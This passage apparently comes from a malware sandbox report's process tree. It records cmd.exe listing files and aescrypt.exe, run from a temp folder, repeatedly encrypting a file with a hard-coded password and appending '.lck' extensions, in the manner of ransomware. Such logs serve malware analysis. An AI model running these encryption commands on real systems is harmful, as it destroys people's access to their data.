    3⤵
    PID:5256
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5380
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5428
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5456
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:4176
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5616
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:4628
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:5796
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5936
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:4928
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5868
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5864
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6048
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5948
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6100
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:4084
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5000
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5104
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1256
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5228
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5212
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:3232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5344
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5360
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:5480
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:5556
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:4788
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5764
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:5840
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5848
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6008
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6016
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:3976
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6116
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1928
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5180
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:2916
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5308
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5352
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5380
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5508
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5692
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5828
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5992
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:6084
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:6120
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
    3⤵
    PID:6140
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
    3⤵
    PID:5196
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
    3⤵
    PID:5284
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
    3⤵
    PID:5344
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5600
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5724
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5900
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6088
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:2496
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5136
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:1276
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5440
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:4240
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5988
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5028
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5252
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5504
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:3144
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:6096
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck.lck"
    3⤵
    PID:5184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5564
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    PID:5172
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
